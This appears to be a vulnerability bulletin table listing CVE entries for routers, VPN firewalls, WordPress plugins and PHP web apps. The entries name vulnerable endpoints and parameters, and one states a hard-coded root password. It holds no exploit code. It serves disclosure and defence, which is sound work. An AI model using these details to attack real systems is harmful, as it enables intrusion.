| Tenda--AC20 | A vulnerability has been found in Tenda AC20 up to 16.03.08.12. The impacted element is the function sscanf of the file /goform/PowerSaveSet. The manipulation of the argument powerSavingEn/time/powerSaveDelay/ledCloseType leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-30 | 8.8 | CVE-2025-15356 | VDB-338742 | Tenda AC20 PowerSaveSet sscanf buffer overflow VDB-338742 | CTI Indicators (IOB, IOC, IOA) Submit #726360 | Tenda Tenda AC20 V16.03.08.12 Buffer Overflow https://github.com/xyh4ck/iot_poc/tree/main/Tenda%20AC20_Buffer_Overflow https://github.com/xyh4ck/iot_poc/blob/main/Tenda%20AC20_Buffer_Overflow/Tenda%20AC20_Buffer_Overflow.md#poc https://www.tenda.com.cn/ |
| QNO Technology--VPN Firewall | VPN Firewall developed by QNO Technology has a Insufficient Entropy vulnerability, allowing unauthenticated remote attackers to obtain any logged-in user session through brute-force attacks and subsequently log into the system. | 2025-12-31 | 8.8 | CVE-2025-15387 | https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html |
| QNO Technology--VPN Firewall | VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server. | 2025-12-31 | 8.8 | CVE-2025-15388 | https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html |
| QNO Technology--VPN Firewall | VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server. | 2025-12-31 | 8.8 | CVE-2025-15389 | https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html |
| UTT--进取 512W | A weakness has been identified in UTT 进取 512W 1.7.7-171114. Affected is the function strcpy of the file /goform/formRemoteControl. Manipulation of the argument Profile causes a buffer overflow. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 8.8 | CVE-2025-15428 | VDB-339350 \| UTT 进取 512W formRemoteControl strcpy buffer overflow VDB-339350 \| CTI Indicators (IOB, IOC, IOA) Submit #721875 \| UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/18.md https://github.com/Lena-lyy/cve/blob/main/1223/18.md#poc |
| UTT--进取 512W | A security vulnerability has been detected in UTT 进取 512W 1.7.7-171114. Affected by this vulnerability is the function strcpy of the file /goform/formConfigCliForEngineerOnly. Manipulation of the argument addCommand leads to a buffer overflow. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 8.8 | CVE-2025-15429 | VDB-339351 \| UTT 进取 512W formConfigCliForEngineerOnly strcpy buffer overflow VDB-339351 \| CTI Indicators (IOB, IOC, IOA) Submit #721876 \| UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/Lena-lyy/cve/blob/main/1223/19.md https://github.com/Lena-lyy/cve/blob/main/1223/19.md#poc |
| UTT--进取 512W | A vulnerability was detected in UTT 进取 512W 1.7.7-171114. Affected by this issue is the function strcpy of the file /goform/formFtpServerShareDirSelcet. Manipulation of the argument oldfilename results in a buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 8.8 | CVE-2025-15430 | VDB-339352 \| UTT 进取 512W formFtpServerShareDirSelcet strcpy buffer overflow VDB-339352 \| CTI Indicators (IOB, IOC, IOA) Submit #721888 \| UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/20.md https://github.com/GUOTINGTING2297/cve/blob/main/1234/20.md#poc |
| UTT--进取 512W | A flaw has been found in UTT 进取 512W 1.7.7-171114. This affects the function strcpy of the file /goform/formFtpServerDirConfig. Manipulation of the argument filename can lead to a buffer overflow. The attack can be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 8.8 | CVE-2025-15431 | VDB-339353 \| UTT 进取 512W formFtpServerDirConfig strcpy buffer overflow VDB-339353 \| CTI Indicators (IOB, IOC, IOA) Submit #721889 \| UTT 进取 512W v3v1.7.7-171114 Buffer Overflow https://github.com/GUOTINGTING2297/cve/blob/main/1234/21.md https://github.com/GUOTINGTING2297/cve/blob/main/1234/21.md#poc |
| Codedraft--Mediabay - WordPress Media Library Folders | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Codedraft Mediabay - WordPress Media Library Folders allows Blind SQL Injection. This issue affects Mediabay - WordPress Media Library Folders: from n/a through 1.4. | 2025-12-31 | 8.5 | CVE-2025-28949 | https://vdp.patchstack.com/database/wordpress/plugin/mediabay/vulnerability/wordpress-mediabay-wordpress-media-library-folders-1-4-sql-injection-vulnerability?_s_id=cve |
| AA-Team--Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in AA-Team Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) allows SQL Injection. This issue affects Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer): from n/a through 1.2. | 2025-12-31 | 8.5 | CVE-2025-30628 | https://vdp.patchstack.com/database/wordpress/plugin/azon-addon-js-composer/vulnerability/wordpress-amazon-affiliates-addon-for-wpbakery-page-builder-formerly-visual-composer-1-2-sql-injection-vulnerability?_s_id=cve |
| Priority--Web | CWE-434 Unrestricted Upload of File with Dangerous Type | 2025-12-29 | 8.8 | CVE-2025-55061 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Plex--Media Server | Plex Media Server (PMS) through 1.42.2.10156 allows retrieval of a permanent access token via a /myplex/account call with a transient access token. | 2026-01-02 | 8.5 | CVE-2025-69414 | https://github.com/lufinkey/vulnerability-research/blob/main/CVE-2025-34158/README.md |
| Selea--Selea CarPlateServer (CPS) | Selea CarPlateServer 4.0.1.6 contains a remote program execution vulnerability that allows attackers to execute arbitrary Windows binaries by manipulating the NO_LIST_EXE_PATH configuration parameter. Attackers can bypass authentication through the /cps/ endpoint and modify server configuration, including changing admin passwords and executing system commands. | 2025-12-31 | 7.5 | CVE-2020-36904 | ExploitDB-49452 Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5622) VulnCheck Advisory: Selea CarPlateServer 4.0.1.6 Remote Program Execution via Configuration Endpoint |
| Nucom--NuCom 11N Wireless Router | NuCom 11N Wireless Router 5.07.90 contains a privilege escalation vulnerability that allows non-privileged users to access administrative credentials through the configuration backup endpoint. Attackers can send a crafted HTTP GET request to the backup configuration page with a specific cookie to retrieve and decode the admin password in Base64 format. | 2025-12-31 | 7.5 | CVE-2021-47726 | ExploitDB-49634 NuCom Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5629) VulnCheck Advisory: NuCom 11N Wireless Router 5.07.90 Privilege Escalation via Configuration Backup |
| KZ Broadband Technologies, Ltd.--JT3500V | KZTech JT3500V 4G LTE CPE 2.0.1 contains a session management vulnerability that allows attackers to reuse old session credentials without proper expiration. Attackers can exploit the weak session handling to maintain unauthorized access and potentially compromise device authentication mechanisms. | 2025-12-31 | 7.5 | CVE-2021-47740 | Zero Science Lab Disclosure (ZSL-2021-5646) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange Entry KZ TECH Vendor Homepage JATON TEC Homepage Neotel Vendor Homepage VulnCheck Advisory: KZTech JT3500V 4G LTE CPE 2.0.1 Insufficient Session Expiration Vulnerability |
| Zblchina--ZBL EPON ONU Broadband Router | ZBL EPON ONU Broadband Router V100R001 contains a privilege escalation vulnerability that allows limited administrative users to elevate access by sending requests to configuration endpoints. Attackers can exploit the vulnerability by accessing the configuration backup or password page to disclose the super user password and gain additional privileged functionalities. | 2025-12-31 | 7.5 | CVE-2021-47741 | ExploitDB-49737 ZBL China Vendor Homepage Archived W&D Thailand Vendor Homepage Zero Science Lab Disclosure (ZSL-2021-5647) VulnCheck Advisory: ZBL EPON ONU Broadband Router V100R001 Privilege Escalation via Configuration Endpoint |
| Cypress--ONE | Cypress Solutions CTM-200/CTM-ONE 1.3.6 contains a hard-coded credentials vulnerability in its Linux distribution that exposes root access. Attackers can exploit the static 'Chameleon' password to gain remote root access via Telnet or SSH on affected devices. | 2025-12-31 | 7.5 | CVE-2021-47744 | ExploitDB-50407 Cypress Solutions Official Homepage Zero Science Lab Disclosure (ZSL-2021-5686) VulnCheck Advisory: Cypress Solutions CTM-200/CTM-ONE 1.3.6 Hard-coded Credentials Remote Root |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an insufficient session expiration vulnerability that allows attackers to reuse old session credentials. Attackers can exploit weak session management to potentially hijack active user sessions and gain unauthorized access to the application. | 2025-12-30 | 7.5 | CVE-2022-50692 | Zero Science Lab Disclosure (ZSL-2022-5724) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session Expiration Vulnerability |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x contain an unauthenticated stored cross-site scripting vulnerability in the username parameter that allows attackers to inject malicious scripts. Attackers can exploit the unvalidated username input to execute arbitrary HTML and JavaScript code in victim browser sessions without authentication. | 2025-12-30 | 7.2 | CVE-2022-50787 | Zero Science Lab Disclosure (ZSL-2022-5731) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Stored Cross-Site Scripting |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive log files. Attackers can directly browse the /log directory to retrieve system and sensitive information without authentication. | 2025-12-30 | 7.5 | CVE-2022-50788 | Zero Science Lab Disclosure (ZSL-2022-5732) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Information Disclosure via Log Directory |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an unauthenticated remote code execution vulnerability in the firmware upload functionality with path traversal flaw. Attackers can exploit the upload.cgi script to write malicious files to the system with www-data permissions, enabling unauthorized access and code execution. | 2025-12-30 | 7.5 | CVE-2022-50796 | Zero Science Lab Disclosure (ZSL-2022-5741) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Unauthenticated Remote Code Execution via upload.cgi |
| Chris Bagwell--SoX | SoX 14.4.2 contains a division by zero vulnerability when handling WAV files that can cause program crashes. Attackers can trigger a floating point exception by providing a specially crafted WAV file that causes arithmetic errors during sound file processing. | 2025-12-30 | 7.5 | CVE-2022-50798 | ExploitDB-51034 SoX Official SourceForge Page SoX Wikipedia Entry Zero Science Lab Disclosure (ZSL-2022-5712) VulnCheck Advisory: SoX 14.4.2 Denial of Service Vulnerability via WAV File Processing |
| Fetch Softworks--Fetch Softworks Fetch FTP Client | Fetch FTP Client 5.8.2 contains a denial of service vulnerability that allows attackers to trigger 100% CPU consumption by sending long server responses. Attackers can send specially crafted FTP server responses exceeding 2K bytes to cause excessive resource utilization and potentially crash the application. | 2025-12-30 | 7.5 | CVE-2022-50799 | ExploitDB-50696 Fetch Softworks Product Homepage Zero Science Lab Disclosure (ZSL-2022-5696) VulnCheck Advisory: Fetch Softworks Fetch FTP Client 5.8.2 Remote CPU Consumption Denial of Service |
| Hangzhou H3C Technologies--H3C SSL VPN | H3C SSL VPN contains a user enumeration vulnerability that allows attackers to identify valid usernames through the 'txtUsrName' POST parameter. Attackers can submit different usernames to the login_submit.cgi endpoint and analyze response messages to distinguish between existing and non-existing accounts. | 2025-12-30 | 7.5 | CVE-2022-50800 | ExploitDB-50742 H3C Official Product Homepage Zero Science Lab Disclosure (ZSL-2022-5697) VulnCheck Advisory: H3C SSL VPN n/a Username Enumeration via Login Script Credential Verification |
| Ateme--Anevia Flamingo XL/XS | Anevia Flamingo XL/XS 3.6.20 contains a critical vulnerability with weak default administrative credentials that can be easily guessed. Attackers can leverage these hard-coded credentials to gain full remote system control without complex authentication mechanisms. | 2025-12-30 | 7.5 | CVE-2023-53983 | Zero Science Lab Disclosure (ZSL-2023-5777) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry CXSecurity Vulnerability Listing Ateme Vendor Homepage VulnCheck Advisory: Anevia Flamingo XL/XS 3.6.20 Default Credentials Authentication Bypass |
| Tinycontrol--LAN Controller | Tinycontrol LAN Controller 1.58a contains an authentication bypass vulnerability that allows unauthenticated attackers to change admin passwords through a crafted API request. Attackers can exploit the /stm.cgi endpoint with a specially crafted authentication parameter to disable access controls and modify administrative credentials. | 2025-12-30 | 7.5 | CVE-2023-54327 | ExploitDB-51732 Tinycontrol Official Product Homepage Zero Science Lab Disclosure (ZSL-2023-5787) VulnCheck Advisory: Tinycontrol LAN Controller 1.58a Authentication Bypass via Admin Password Change |
| The Akuvox Company--Akuvox Smart Doorphone | Akuvox Smart Intercom S539 contains an improper access control vulnerability that allows users with 'User' privileges to modify API access settings and configurations. Attackers can exploit this vulnerability to escalate privileges and gain unauthorized access to administrative functionalities. | 2025-12-30 | 7.5 | CVE-2024-58337 | Zero Science Lab Disclosure (ZSL-2024-5862) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing VulnCheck Advisory: Akuvox Smart Intercom S539 Improper Access Control via ServicesHTTPAPI |
| monetizemore--Advanced Ads Ad Manager & AdSense | The Advanced Ads plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.0.14 via the 'change-ad__content' shortcode parameter. This allows authenticated attackers with editor-level permissions or above, to execute code on the server. | 2025-12-29 | 7.2 | CVE-2025-13592 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f9e83561-aa71-4984-8a26-207e208d70e8?source=cve https://plugins.trac.wordpress.org/browser/advanced-ads/tags/2.0.14/includes/ads/class-ad-plain.php#L36 https://plugins.trac.wordpress.org/changeset/3427297/advanced-ads#file9 |
| villatheme--Lucky Wheel for WooCommerce Spin a Sale | The Lucky Wheel for WooCommerce - Spin a Sale plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 1.1.13. This is due to the plugin using eval() to execute user-supplied input from the 'Conditional Tags' setting without proper validation or sanitization. This makes it possible for authenticated attackers, with Administrator-level access and above, to execute arbitrary PHP code on the server. In WordPress multisite installations, this allows Site Administrators to execute arbitrary code, a capability they should not have since plugin/theme file editing is disabled for non-Super Admins in multisite environments. | 2025-12-30 | 7.2 | CVE-2025-14509 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9a41bc0e-0ab9-4cee-b3ca-d730c828782c?source=cve https://plugins.trac.wordpress.org/browser/woo-lucky-wheel/trunk/frontend/frontend.php#L127 https://plugins.trac.wordpress.org/browser/woo-lucky-wheel/tags/1.1.13/frontend/frontend.php#L127 https://plugins.trac.wordpress.org/changeset/3428063/ |
| Innorix--Innorix WP | Unrestricted Upload of File with Dangerous Type vulnerability in Innorix Innorix WP allows Upload a Web Shell to a Web Server. This issue affects all versions of Innorix WP if the "exam" directory exists under the directory where the product is installed (e.g. innorix/exam). | 2025-12-29 | 7.7 | CVE-2025-15067 | https://www.innorix.com/ https://www.gnit.co.kr/software/innorix_product.html |
| Gmission--Web Fax | Missing Authorization vulnerability in Gmission Web Fax allows Privilege Abuse, Session Credential Falsification through Manipulation. This issue affects Web Fax: from 3.0 before 4.0. | 2025-12-29 | 7.7 | CVE-2025-15068 | https://www.gmission.co.kr/fax1 |
| Gmission--Web Fax | Improper Authentication vulnerability in Gmission Web Fax allows Privilege Escalation. This issue affects Web Fax: from 3.0 before 4.0. | 2025-12-29 | 7.1 | CVE-2025-15069 | https://www.gmission.co.kr/fax1 |
| Ksenia Security S.p.A.--Ksenia Security Lares 4.0 Home Automation | Ksenia Security Lares 4.0 Home Automation version 1.6 contains a default credentials vulnerability that allows unauthorized attackers to gain administrative access. Attackers can exploit the weak default administrative credentials to obtain full control of the home automation system. | 2025-12-30 | 7.5 | CVE-2025-15111 | Zero Science Lab Disclosure (ZSL-2025-5927) Packet Storm Security Exploit Entry Ksenia Security Vendor Homepage VulnCheck Advisory: Ksenia Security Lares 4.0 Home Automation 1.6 Default Credentials Vulnerability |
| Ksenia Security S.p.A.--Ksenia Security Lares 4.0 Home Automation | Ksenia Security Lares 4.0 Home Automation version 1.6 contains an unprotected endpoint vulnerability that allows authenticated attackers to upload MPFS File System binary images. Attackers can exploit this vulnerability to overwrite flash program memory and potentially execute arbitrary code on the home automation system's web server. | 2025-12-30 | 7.8 | CVE-2025-15113 | Zero Science Lab Disclosure (ZSL-2025-5930) Ksenia Security Vendor Homepage Packet Storm Security Exploit VulnCheck Advisory: Ksenia Security Lares 4.0 Home Automation 1.6 Remote Code Execution via MPFS Upload |
| Tenda--WH450 | A vulnerability was identified in Tenda WH450 1.0.0.18. Affected by this issue is some unknown functionality of the file /goform/SafeEmailFilter. Manipulation of the argument page leads to a stack-based buffer overflow. The attack can be carried out remotely. The exploit is publicly available and might be used. | 2025-12-29 | 7.2 | CVE-2025-15163 | VDB-338538 \| Tenda WH450 SafeEmailFilter stack-based overflow VDB-338538 \| CTI Indicators (IOB, IOC, IOA) Submit #721214 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeEmailFilter/SafeEmailFilter.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A security flaw has been discovered in Tenda WH450 1.0.0.18. This affects an unknown part of the file /goform/SafeMacFilter. Manipulation of the argument page results in a stack-based buffer overflow. The attack may be performed remotely. The exploit has been released to the public and may be exploited. | 2025-12-29 | 7.2 | CVE-2025-15164 | VDB-338539 \| Tenda WH450 SafeMacFilter stack-based overflow VDB-338539 \| CTI Indicators (IOB, IOC, IOA) Submit #721215 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SafeMacFilter/SafeMacFilter.md https://www.tenda.com.cn/ |
| itsourcecode--Online Cake Ordering System | A vulnerability has been found in itsourcecode Online Cake Ordering System 1.0. The impacted element is an unknown function of the file /updatecustomer.php?action=edit. Manipulation of the argument ID leads to SQL injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-29 | 7.3 | CVE-2025-15165 | VDB-338544 \| itsourcecode Online Cake Ordering System updatecustomer.php sql injection VDB-338544 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721106 \| itsourcecode Online Cake Ordering System V1.0 SQL Injection https://github.com/LaneyYu/cve/issues/4 https://itsourcecode.com/ |
| itsourcecode--Online Cake Ordering System | A vulnerability was found in itsourcecode Online Cake Ordering System 1.0. This affects an unknown function of the file /updatesupplier.php?action=edit. Manipulation of the argument ID results in SQL injection. The attack may be launched remotely. The exploit has been made public and could be used. | 2025-12-29 | 7.3 | CVE-2025-15166 | VDB-338545 \| itsourcecode Online Cake Ordering System updatesupplier.php sql injection VDB-338545 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721108 \| itsourcecode Online Cake Ordering System V1.0 SQL Injection https://github.com/LaneyYu/cve/issues/5 https://itsourcecode.com/ |
| itsourcecode--Online Cake Ordering System | A vulnerability was determined in itsourcecode Online Cake Ordering System 1.0. This impacts an unknown function of the file /detailtransac.php. Manipulation of the argument ID causes SQL injection. Remote exploitation is possible. The exploit has been publicly disclosed and may be utilized. | 2025-12-29 | 7.3 | CVE-2025-15167 | VDB-338546 \| itsourcecode Online Cake Ordering System detailtransac.php sql injection VDB-338546 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721109 \| itsourcecode Online Cake Ordering System V1.0 SQL Injection https://github.com/LaneyYu/cve/issues/6 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was identified in itsourcecode Student Management System 1.0. Affected is an unknown function of the file /statistical.php. Manipulation of the argument ID leads to SQL injection. The attack can be executed remotely. The exploit is publicly available and might be used. | 2025-12-29 | 7.3 | CVE-2025-15168 | VDB-338547 \| itsourcecode Student Management System statistical.php sql injection VDB-338547 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721155 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/Susen2/cve/issues/1 https://itsourcecode.com/ |
| Tenda--WH450 | A vulnerability has been found in Tenda WH450 1.0.0.18. This vulnerability affects unknown code of the file /goform/SetIpBind of the component HTTP Request Handler. Manipulation of the argument page leads to a stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-29 | 7.2 | CVE-2025-15177 | VDB-338562 \| Tenda WH450 HTTP Request SetIpBind stack-based overflow VDB-338562 \| CTI Indicators (IOB, IOC, IOA) Submit #721216 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SetIpBind/SetIpBind.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/SetIpBind/SetIpBind.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was found in Tenda WH450 1.0.0.18. This issue affects some unknown processing of the file /goform/VirtualSer of the component HTTP Request Handler. Manipulation of the argument page results in a stack-based buffer overflow. The attack can be launched remotely. The exploit has been made public and could be used. | 2025-12-29 | 7.2 | CVE-2025-15178 | VDB-338563 \| Tenda WH450 HTTP Request VirtualSer stack-based overflow VDB-338563 \| CTI Indicators (IOB, IOC, IOA) Submit #721217 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/VirtualSer/VirtualSer.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/VirtualSer/VirtualSer.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was determined in Tenda WH450 1.0.0.18. Impacted is an unknown function of the file /goform/qossetting. Manipulation of the argument page causes a stack-based buffer overflow. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-29 | 7.2 | CVE-2025-15179 | VDB-338564 \| Tenda WH450 qossetting stack-based overflow VDB-338564 \| CTI Indicators (IOB, IOC, IOA) Submit #721218 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/qossetting/qossetting.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/qossetting/qossetting.md#reproduce https://www.tenda.com.cn/ |
| Tenda--WH450 | A vulnerability was identified in Tenda WH450 1.0.0.18. The affected element is an unknown function of the file /goform/webExcptypemanFilte of the component HTTP Request Handler. Manipulation of the argument page leads to a stack-based buffer overflow. The attack may be launched remotely. The exploit is publicly available and might be used. | 2025-12-29 | 7.2 | CVE-2025-15180 | VDB-338565 \| Tenda WH450 HTTP Request webExcptypemanFilte stack-based overflow VDB-338565 \| CTI Indicators (IOB, IOC, IOA) Submit #721219 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/webExcptypemanFilter/webExcptypemanFilter.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/webExcptypemanFilter/webExcptypemanFilter.md#reproduce https://www.tenda.com.cn/ |
| code-projects--Refugee Food Management System | A security flaw has been discovered in code-projects Refugee Food Management System 1.0. The impacted element is an unknown function of the file /home/pagenateRefugeesList.php. Manipulation of the argument rfid results in SQL injection. Remote exploitation is possible. The exploit has been released to the public and may be exploited. | 2025-12-29 | 7.3 | CVE-2025-15181 | VDB-338566 \| code-projects Refugee Food Management System pagenateRefugeesList.php sql injection VDB-338566 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #721270 \| Code-projects Refugee Food Management System v1.0 SQL Injection Submit #722805 \| code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) https://github.com/ctg503/CVE/issues/1 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A weakness has been identified in code-projects Refugee Food Management System 1.0. This affects an unknown function of the file /home/served.php. Executing manipulation of the argument refNo can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-12-29 | 7.3 | CVE-2025-15182 | VDB-338567 | code-projects Refugee Food Management System served.php sql injection VDB-338567 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721272 | Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/ctg503/CVE/issues/2 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A security vulnerability has been detected in code-projects Refugee Food Management System 1.0. This impacts an unknown function of the file /home/viewtakenfd.php. The manipulation of the argument tfid leads to sql injection. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. | 2025-12-29 | 7.3 | CVE-2025-15183 | VDB-338568 | code-projects Refugee Food Management System viewtakenfd.php sql injection VDB-338568 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721273 | Code-projects Refugee Food Management System v1.0 SQL Injection Submit #722808 | code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) Submit #722809 | code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) Submit #722810 | code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) https://github.com/ctg503/CVE/issues/3 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A vulnerability was detected in code-projects Refugee Food Management System 1.0. Affected is an unknown function of the file /home/refugeesreport2.php. The manipulation of the argument a results in sql injection. The attack may be performed remotely. The exploit is now public and may be used. | 2025-12-29 | 7.3 | CVE-2025-15184 | VDB-338569 | code-projects Refugee Food Management System refugeesreport2.php sql injection VDB-338569 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721274 | Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/ctg503/CVE/issues/4 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A flaw has been found in code-projects Refugee Food Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /home/refugeesreport.php. This manipulation of the argument a causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2025-12-29 | 7.3 | CVE-2025-15185 | VDB-338570 | code-projects Refugee Food Management System refugeesreport.php sql injection VDB-338570 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721275 | Code-projects Refugee Food Management System v1.0 SQL Injection https://github.com/ctg503/CVE/issues/5 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A vulnerability has been found in code-projects Refugee Food Management System 1.0. Affected by this issue is some unknown functionality of the file /home/addusers.php. Such manipulation of the argument a leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-29 | 7.3 | CVE-2025-15186 | VDB-338571 | code-projects Refugee Food Management System addusers.php sql injection VDB-338571 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721277 | Code-projects Refugee Food Management System v1.0 SQL Injection Submit #722802 | code-projects Refugee Food Management System 1.0 SQL Injection (Duplicate) https://github.com/ctg503/CVE/issues/6 https://code-projects.org/ |
| code-projects--Assessment Management | A vulnerability was determined in code-projects Assessment Management 1.0. Affected by this issue is some unknown functionality of the file /admin/add-module.php. This manipulation of the argument linked[] causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-29 | 7.3 | CVE-2025-15195 | VDB-338582 | code-projects Assessment Management add-module.php sql injection VDB-338582 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724717 | Code-projects Assessment Management v1.0 SQL injection https://github.com/Limingqian123/CVE/issues/3 https://code-projects.org/ |
| code-projects--Assessment Management | A vulnerability was identified in code-projects Assessment Management 1.0. This affects an unknown part of the file login.php. Such manipulation of the argument userid leads to sql injection. The attack can be launched remotely. The exploit is publicly available and might be used. | 2025-12-29 | 7.3 | CVE-2025-15196 | VDB-338583 | code-projects Assessment Management login.php sql injection VDB-338583 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724718 | Code-projects Assessment Management v1.0 SQL injection https://github.com/Limingqian123/CVE/issues/4 https://code-projects.org/ |
| code-projects--College Notes Uploading System | A weakness has been identified in code-projects College Notes Uploading System 1.0. This issue affects some unknown processing of the file /login.php. Executing manipulation of the argument User can lead to sql injection. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. | 2025-12-29 | 7.3 | CVE-2025-15198 | VDB-338585 | code-projects College Notes Uploading System login.php sql injection VDB-338585 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724724 | Code-projects College Notes Uploading System v1.0 SQL injection https://github.com/Limingqian123/CVE/issues/10 https://code-projects.org/ |
